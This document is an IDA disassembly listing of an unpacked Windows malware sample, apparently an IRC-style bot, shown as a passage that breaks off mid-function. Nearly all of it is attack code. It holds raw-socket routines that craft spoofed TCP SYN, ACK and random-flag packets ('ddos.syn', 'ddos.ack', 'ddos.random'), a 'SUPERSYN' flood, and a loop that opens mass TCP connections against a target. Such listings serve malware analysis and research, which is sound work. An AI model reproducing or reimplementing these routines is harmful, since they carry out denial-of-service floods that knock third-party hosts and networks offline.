;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 01E926B5561CA2ECCC91E1A3817709F9
; File Name : u:\work\01e926b5561ca2eccc91e1a3817709f9_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00022174 ( 139636.)
; Section size in file : 00022174 ( 139636.)
; Offset to raw data for section: 00001000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0 segment para public 'CODE' use32
assume cs:_0
;org 401000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_40EE72+3A15�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013EC
add esp, 14h
push eax
lea eax, [ebp+var_494]
push offset unk_426050
push eax
call sub_4172B0
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401093
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40D679
add esp, 14h
loc_401093: ; CODE XREF: sub_401000+71�j
lea eax, [ebp+var_494]
push eax
call sub_40BF6D
push [ebp+var_290]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_401000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B5 proc near ; CODE XREF: sub_4013EC+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_43AD10 ;; WSAStartup
test eax, eax
jz short loc_4010F5
xor eax, eax
jmp loc_4013E8
; ---------------------------------------------------------------------------
loc_4010F5: ; CODE XREF: sub_4010B5+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43AE3C ;; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4013E0
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call ds:dword_43AD78 ;; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4013D6
push [ebp+arg_C]
mov [ebp+var_58], 2
call ds:dword_43AD98 ;; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call ds:dword_43AD98 ;; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call ds:dword_43AD98 ;; htons
mov [ebp+var_12], ax
call sub_41730C
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_43AD98 ;; htons
push 12345678h
mov [ebp+var_14], ax
call ds:dword_43AD94 ;; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C5
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011C5: ; CODE XREF: sub_4010B5+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011E1
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011E1: ; CODE XREF: sub_4010B5+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_401219
call sub_41730C
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_41730C
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401219: ; CODE XREF: sub_4010B5+10E�j
; sub_4010B5+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call ds:dword_43AD98 ;; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_424060 ;; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_42405C ;; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_417760
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401267: ; CODE XREF: sub_4010B5+2E2�j
; sub_4010B5+2F0�j
mov [ebp+var_4], bx
call sub_41730C
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_43AD98 ;; htons
mov [ebp+var_14], ax
call sub_41730C
mov edi, eax
shl edi, 10h
call sub_41730C
or edi, eax
push edi
call ds:dword_43AD98 ;; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_43AD94 ;; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_43AD98 ;; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417390
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF39
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF39
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call ds:dword_43ADFC ;; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013AA
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_42405C ;; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4013D3
jl loc_401267
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4013D3
jmp loc_401267
; ---------------------------------------------------------------------------
loc_4013AA: ; CODE XREF: sub_4010B5+2CB�j
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_426088
push eax
call sub_4172B0
lea eax, [ebp+var_F4]
push eax
call sub_40BF6D
add esp, 10h
jmp short loc_4013D6
; ---------------------------------------------------------------------------
loc_4013D3: ; CODE XREF: sub_4010B5+2E0�j
; sub_4010B5+2EE�j
mov ebx, [ebp+arg_8]
loc_4013D6: ; CODE XREF: sub_4010B5+78�j
; sub_4010B5+31C�j
push [ebp+var_20]
call ds:dword_43AE30 ;; closesocket
pop esi
loc_4013E0: ; CODE XREF: sub_4010B5+5B�j
call ds:dword_43ACF8 ;; WSACleanup
mov eax, ebx
loc_4013E8: ; CODE XREF: sub_4010B5+3B�j
pop edi
pop ebx
leave
retn
sub_4010B5 endp
; =============== S U B R O U T I N E =======================================
sub_4013EC proc near ; CODE XREF: sub_401000+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov esi, eax
call sub_41781F
push [esp+14h+arg_C]
mov ebx, eax
call sub_41781F
mov edi, eax
call sub_41730C
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4010B5
add esp, 20h
test eax, eax
jnz short loc_40143B
push 1
pop eax
loc_40143B: ; CODE XREF: sub_4013EC+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40144A proc near ; DATA XREF: sub_40EE72+3C03�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_43AE18 ;; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4014E5
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
loc_401493: ; DATA XREF: _2:off_4282AC�o
push offset unk_426214
push eax
call sub_4172B0
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C8
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_4014C8: ; CODE XREF: sub_40144A+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_4014E5: ; CODE XREF: sub_40144A+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call ds:dword_43AD78 ;; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40155C
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4261CC
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_40153F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_40153F: ; CODE XREF: sub_40144A+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_40155C: ; CODE XREF: sub_40144A+B3�j
lea eax, [ebp+var_1B8]
push eax
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4015C3
lea eax, [ebp+var_3BC]
push offset unk_42619C
push eax
call sub_4172B0
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A6
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_4015A6: ; CODE XREF: sub_40144A+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_4015C3: ; CODE XREF: sub_40144A+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call ds:dword_43AD98 ;; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov esi, ds:dword_424058
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_401601: ; CODE XREF: sub_40144A+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4017AC
push 41Ch
mov ds:byte_436AB8, 45h
call ds:dword_43AD98 ;; htons
cmp [ebp+var_2C], edi
mov ds:word_436ABA, ax
mov ds:word_436ABC, bx
mov ds:word_436ABE, di
mov ds:byte_436AC0, 80h
mov ds:byte_436AC1, bl
mov ds:word_436AC2, di
jz short loc_401687
call sub_41730C
mov ebx, eax
shl ebx, 8
call sub_41730C
add ebx, eax
shl ebx, 8
call sub_41730C
add ebx, eax
shl ebx, 8
call sub_41730C
add ebx, eax
push 1
mov ds:dword_436AC4, ebx
pop ebx
jmp short loc_40169F
; ---------------------------------------------------------------------------
loc_401687: ; CODE XREF: sub_40144A+20B�j
push [ebp+var_1BC]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43ADD8 ;; inet_addr
mov ds:dword_436AC4, eax
loc_40169F: ; CODE XREF: sub_40144A+23B�j
mov eax, [ebp+var_18]
mov ds:dword_436AC8, eax
call sub_41730C
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_436ACC, dl
call sub_41730C
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_436ACD, dl
call sub_41730C
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov ds:word_436ACE, di
mov ds:word_436AD2, bx
inc edx
mov ds:word_436AD0, dx
call sub_41730C
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_436AD4
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_436AB8
push [ebp+var_4]
call ds:dword_43ADFC ;; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401737
inc [ebp+arg_0]
jmp loc_401601
; ---------------------------------------------------------------------------
loc_401737: ; CODE XREF: sub_40144A+2E3�j
push [ebp+var_4]
call ds:dword_43AE30 ;; closesocket
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_42613C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41782A
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40178F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_40178F: ; CODE XREF: sub_40144A+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_4017AC: ; CODE XREF: sub_40144A+1C8�j
push [ebp+var_4]
call ds:dword_43AE30 ;; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_4260DC
push eax
call sub_4172B0
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_401814
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_401814: ; CODE XREF: sub_40144A+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
sub_40144A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401831 proc near ; DATA XREF: sub_40EE72+159D�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401992
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset aSupersynDoneWi ; "[SUPERSYN]: Done with flood (%iKB/sec)"
push eax
call sub_4172B0
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4018B1
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_4018B1: ; CODE XREF: sub_401831+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_401831 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018D0 proc near ; CODE XREF: sub_401992+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call ds:dword_43AD98 ;; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_40198E
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_40191B: ; CODE XREF: sub_4018D0+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_401923: ; CODE XREF: sub_4018D0+7A�j
push 0
push 1
push 2
call ds:dword_424214 ;; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_401946
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_424218 ;; ioctlsocket
loc_401946: ; CODE XREF: sub_4018D0+64�j
add esi, 4
dec ebx
jnz short loc_401923
lea esi, [ebp+var_654]
mov ebx, edi
loc_401954: ; CODE XREF: sub_4018D0+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call ds:dword_42421C ;; connect
add esi, 4
dec ebx
jnz short loc_401954
push 64h
call ds:dword_424064 ;; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_401978: ; CODE XREF: sub_4018D0+B4�j
push dword ptr [esi]
call ds:dword_424220 ;; closesocket
add esi, 4
dec ebx
jnz short loc_401978
dec [ebp+arg_4]
jnz short loc_40191B
pop edi
pop esi
pop ebx
loc_40198E: ; CODE XREF: sub_4018D0+3E�j
xor eax, eax
leave
retn
sub_4018D0 endp
; =============== S U B R O U T I N E =======================================
sub_401992 proc near ; CODE XREF: sub_401831+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov edi, eax
call sub_41781F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41781F
mov esi, eax
push esi
push ebx
push edi
call sub_4018D0
add esp, 18h
test eax, eax
jnz short loc_4019C8
push 1
pop eax
loc_4019C8: ; CODE XREF: sub_401992+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_401992 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019D7 proc near ; DATA XREF: sub_40EE72+3906�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401D28
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset dword_426280
push eax
call sub_4172B0
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401A57
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_401A57: ; CODE XREF: sub_4019D7+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_4019D7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A76 proc near ; CODE XREF: sub_401D28+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_43AD10 ;; WSAStartup
test eax, eax
jz short loc_401AB6
xor eax, eax
jmp loc_401D24
; ---------------------------------------------------------------------------
loc_401AB6: ; CODE XREF: sub_401A76+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43AE3C ;; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_401D1C
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call ds:dword_43AD78 ;; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_401D12
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call ds:dword_43AD98 ;; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call ds:dword_43AD98 ;; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call ds:dword_43AD98 ;; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call ds:dword_43AD98 ;; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_424060 ;; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_42405C ;; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_417760
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_401BA1: ; CODE XREF: sub_401A76+25D�j
; sub_401A76+26B�j
mov [ebp+var_24], bx
call sub_41730C
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_43AD98 ;; htons
mov [ebp+var_34], ax
call sub_41730C
mov edi, eax
shl edi, 10h
call sub_41730C
or edi, eax
push edi
call ds:dword_43AD98 ;; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_43AD94 ;; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_43AD98 ;; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417390
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF39
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF39
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call ds:dword_43ADFC ;; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401CE6
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
